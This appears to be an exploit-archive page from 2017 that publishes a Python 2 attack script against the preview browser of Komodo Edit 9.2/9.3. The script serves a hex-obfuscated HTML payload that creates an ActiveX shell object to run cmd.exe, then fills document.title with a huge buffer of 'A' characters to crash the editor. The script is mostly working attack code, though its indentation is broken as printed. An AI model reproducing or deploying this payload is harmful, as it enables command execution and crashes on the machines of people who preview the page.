Komodo Edit 9.2 / 9.3 Buffer Overflow

Posted on 18 February 2017
#ActiveState komodoEdit9.2/9.3 preview browser buffer
'''
go to preview browser
preview with another file or url
-payload-
preview using [In a komodo tab]
'''
#Author: sultan albalawi
#video:https://www.facebook.com/pentest3/videos/vb.100012552940568/261386070956489/?type=2&theater
#Tested on:win7
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import subprocess,string
uhost='0.0.0.0'
port=8080
ban= 'x0dx0ax20x20x20x20x20x20x20x5cx20x20x20x2dx20x20'
ban+='x2dx20x20x2dx20x3cx73x65x72x76x65x72x3ex20x20x2d'
ban+='x20x5cx2dx2dx2dx3cx20x2dx20x2dx20x20x2dx20x2dx20'
ban+='x20x2dx20x20x2ax0dx0ax20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x2ax2ax2ax0dx0ax20x20x20'
ban+='x20x20x20x20x7cx20x20x20x20x44x6fx63x5fx41x74x74'
ban+='x61x63x6bx20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x2ax2ax2a'
ban+='x2ax2ax0dx0ax20x20x20x20x20x20x20x7cx20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20'
ban+='x20x20x20x76x20x20x20x20x20x20x20x20x60x20x60x2e'
ban+='x20x20x20x20x2cx3bx27x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x2ax2ax2ax2ax41x70x50'
ban+='x2ax2ax2ax2ax0dx0ax20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x60x2ex20x20x2cx27x2fx20x2ex27'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0d'
ban+='x0ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x60x2ex20x58x20x2fx2ex27x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x2ax20x20x20x20x20x2ax2ax2a'
ban+='x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20'
ban+='x20x20x20x2ex2dx3bx2dx2dx27x27x2dx2dx2ex5fx60x20'
ban+='x60x20x28x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x2ax2ax2ax20x20x20x20x20x20x20x20x20x20x7cx0d'
ban+='x0ax20x20x20x20x20x2ex27x20x20x20x20x20x20x20x20'
ban+='x20x20x20x2fx20x20x20x20x27x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x2ax2ax2ax2ax2ax20x20x20x20x20x20'
ban+='x20x20x20x7cx20x64x61x74x61x62x61x73x65x0dx0ax20'
ban+='x20x20x20x20x3bx53x65x63x75x72x69x74x79x60x20x20'
ban+='x27x20x30x20x20x30x20x27x20x20x20x20x20x20x20x20'
ban+='x20x2ax2ax2ax4ex45x54x2ax2ax2ax20x20x20x20x20x20'
ban+='x20x7cx0dx0ax20x20x20x20x2cx20x20x20x20x20x20x20'
ban+='x2cx20x20x20x20x27x20x20x7cx20x20x27x20x20x20x20'
ban+='x20x20x20x20x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax20'
ban+='x20x20x20x20x20x20x5ex0dx0ax20x2cx2ex20x7cx20x20'
ban+='x20x20x20x20x20x27x20x20x20x20x20x60x2ex5fx2ex27'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x7c'
ban+='x2dx2dx2dx2dx2dx2dx2dx5ex2dx2dx2dx5ex20x20x20x20'
ban+='x20x20x20x20x20x20x2fx0dx0ax20x3ax20x20x2ex20x60'
ban+='x20x20x3bx20x20x20x60x20x20x60x20x2dx2dx2cx2ex2e'
ban+='x5fx3bx2dx2dx2dx3ex20x20x20x20x20x20x20x20x20x7c'
ban+='x20x20x20x20x20x20x20x27x2ex27x2ex27x5fx5fx5fx5f'
ban+='x5fx5fx5fx5fx20x2ax0dx0ax20x20x27x20x60x20x20x20'
ban+='x20x2cx20x20x20x29x20x20x20x2ex27x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x5ex20'
ban+='x20x20x20x20x20x20x20x7cx5fx7cx20x46x69x72x65x77'
ban+='x61x6cx6cx20x29x0dx0ax20x20x20x20x20x60x2ex5fx20'
ban+='x2cx20x20x27x20x20x20x2fx5fx20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x7cx20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x7cx7cx20x20x20x20'
ban+='x7cx7cx0dx0ax20x20x20x20x20x20x20x20x3bx20x2cx27'
ban+='x27x2dx2cx3bx27x20x60x60x2dx5fx5fx5fx5fx5fx5fx5f'
ban+='x5fx5fx5fx5fx5fx5fx5fx5fx5fx5fx7cx0dx0ax20x20x20'
ban+='x20x20x20x20x20x20x60x60x2dx2ex2ex5fx5fx60x60x2d'
ban+='x2dx60x20x20x20x20x20x20x20x69x70x73x20x20x20x20'
ban+='x20x20x20x2dx20x20x20x20x20x20x20x20x20x20x20x5e'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x2fx0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x2dx20x20x20x20x20x20x20x20x27'
ban+='x2ex20x5fx2dx2dx2dx2dx2dx2dx2dx2dx2dx2ax0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x2dx5fx5fx5fx5fx5fx5fx5fx20'
ban+='x7cx5fx20x20x49x50x53x20x20x20x20x20x29x0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x7cx7cx20x20x20x20x20x7cx7cx0dx0ax20'
ban+='
'
ban+='x53x75x6cx74x61x6ex5fx41x6cx62x61x6cx61x77x69
'
ban+='x68x74x74x70x73x3ax2fx2fx77x77x77x2ex66x61x63x65x62x6fx6fx6bx2ex63x6fx6dx2fx70x65x6ex74x65x73x74x33
'
print ban
print "please wait ...."
htmlcrach=('''x3cx68x74x6dx6cx3ex0dx0ax3cx62x6fx64x79x3ex0dx0ax3cx73x63x72x69x70x74x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x3ex0dx0ax66x75x6ex63x74x69x6fx6ex20x65x78x28x29x0dx0ax7bx0dx0ax76x61x72x20x6fx62x6ax53x68x65x6cx6cx20x3dx20x6ex65x77x20x41x63x74x69x76x65x58x4fx62x6ax65x63x74x28x22x73x68x65x6cx6cx2ex61x70x70x6cx69x63x61x74x69x6fx6ex22x29x3bx0dx0ax6fx62x6ax53x68x65x6cx6cx2ex53x68x65x6cx6cx45x78x65x63x75x74x65x28x22x63x6dx64x2ex65x78x65x22x2cx20x22x63x64x20x43x3ax20x43x3ax5cx5cx63x64x20x63x3ax5cx5cx65x78x74x5fx66x69x6cx65x20x6dx61x69x6ex2ex65x78x65x20x74x65x73x74x2ex74x78x74x22x2cx20x22x43x3ax5cx5cx57x49x4ex44x4fx57x53x5cx5cx73x79x73x74x65x6dx33x32x22x2cx20x22x6fx70x65x6ex22x2cx20x31x29x3bx0dx0ax7dx0dx0ax7bx0dx0ax76x61x72x20x62x75x66x20x3dx20x22x22x3bx0dx0ax66x6fx72x20x28x76x61x72x20x69x20x3dx20x30x3bx20x69x20x3cx35x30x30x30x30x3bx20x69x2bx2bx29x20x7bx0dx0ax62x75x66x20x2bx3dx20x22x5cx78x34x31x22x3bx0dx0ax7dx0dx0ax76x61x72x20x62x75x66x66x20x3dx20x62x75x66x3bx0dx0ax66x6fx72x20x28x69x20x3dx20x30x3bx20x69x20x3cx35x30x30x30x3bx20x69x2bx2bx29x20x7bx0dx0ax62x75x66x66x20x2bx3dx20x62x75x66x3bx0dx0ax7dx0dx0ax64x6fx63x75x6dx65x6ex74x2ex74x69x74x6cx65x20x3dx20x62x75x66x66x3bx0dx0ax7dx0dx0ax3cx2fx73x63x72x69x70x74x3ex3cx62x6fx64x79x3ex3cx61x20x68x72x65x66x3dx22x6ax61x76x61x73x63x72x69x70x74x3ax65x78x28x29x3bx22x3ex43x6cx69x63x6bx5fx43x72x61x73x68x0dx0ax3cx2fx61x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e''')
class Req(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(htmlcrach)
class runHTTP(HTTPServer):
def __init__(self,uhost,port):
ipadd=(uhost,port)
HTTPServer.__init__(self,ipadd,Req)
def createfile():
global filecreate
filecreate = "komodo-edit_9.2.1.html"
open(filecreate, "wb").write(htmlcrach)
print ('file done: {}').format(filecreate)
def start():
global filecreate
ser=runHTTP(uhost,port)
print "http://{}:{}/{}".format(uhost,port,filecreate)
ser.serve_forever()
createfile()
start()
TOP
Malware :

Last 20
Exploits :

Last 20